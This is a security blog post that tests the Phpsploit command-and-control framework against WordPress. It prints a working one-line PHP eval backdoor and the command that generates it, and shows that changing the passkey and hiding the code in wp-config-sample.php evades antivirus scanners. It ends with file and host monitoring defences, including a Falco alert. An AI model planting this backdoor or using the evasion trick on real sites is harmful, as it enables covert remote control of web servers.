Backdooring WordPress with Phpsploit

Backdooring WordPress with Phpsploit

As many of you know, WordPress is written in PHP. Finding backdoors in PHP and WordPress code can be quite tricky and sometimes almost impossible: Since backdoors could be hidden anywhere in the code and look like regular code with human coding errors, and a regular installation of WordPress consists of about 432,709 lines of PHP-code.

So instead of reading all the code and looking for backdoors we could use automated tools like antivirus-software, and a popular open source antivirus software is ClamAV.

Today we are going to test the offensive Command and Control (C2) software Phpsploit, described as below from their Github page:

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

When running Phpsploit and generating a standard backdoor to place in WordPress or PHP-code it looks like this:

<?php @eval($_SERVER[‘HTTP_PHPSPL01T’]); ?>

The above code can be generated by running the following command:

./phpsploit --interactive --eval "backdoor"

And if we insert this little eval-code snippet into a WordPress php-file and then upload the file to VirusTotal the detection rate looks like this for the 58 different antivirus-scanners currently online:

VirusTotal Phpsploit

Just one hit and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.

If we then run phpsploit again and set another PASSKEY like this:

The backdoor code also looks different:

<?php @eval($_SERVER[‘HTTP_LFN2DZLOE’]); ?>

And then if we use this code and we hide it in wp-config-sample.php and upload the code to VirusTotal again:

VirusTotal bypass

Great! We are now bypassing all known malware engines listed at VirusTotal by making a small change. Installing the backdoor is outside of this blog post, but it could be a vulnerable version of a plugin (as one of many examples).

As soon as the backdoor is in place, we can use the backdoor with set TARGET and exploit and then obtain a shell:

Great. We can now start to do local Linux reconnaissance in order to find user escalation vulnerabilities with commands like whoami, ls and pwd:

When looking at the network level the PHP-code being sent over the wire is looking like below. And should be quite easy to trigger IDS alerts at network level since PHP-code like eval and base64_decode should not be a part of a http-header. This can also of course be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.

But running Suricata with updated rules found nothing:

 

Conclusions

Even with small modifications of the PHP-backdoor code provided by Phpsploit it is hard for antivirus software to find the backdoor. The best defense to this is to monitor all changes in the www-folder with open-source tools like OSSEC or Wazuh.

When running Sysdig Falco and running Phpsploit the following log entry shows up, “Debug Shell spawned by untrusted binary”

syslog:Mar 23 17:18:04 vagrant falco: 17:18:04.781532982: Debug Shell spawned by untrusted binary (user=vagrant shell=sh parent=apache2 cmdline=sh -c echo $HOME pcmdline=apache2 -k start gparent=apache2 ggparent=systemd aname[4]=<NA> aname[5]=<NA> aname[6]=<NA> aname[7]=<NA> container_id=host image=<NA>)

Read more about how to find backdoors with Sysdig Falco in our blog post here.

 

Video

Files

Leave a Comment

Your email address will not be published. Required fields are marked *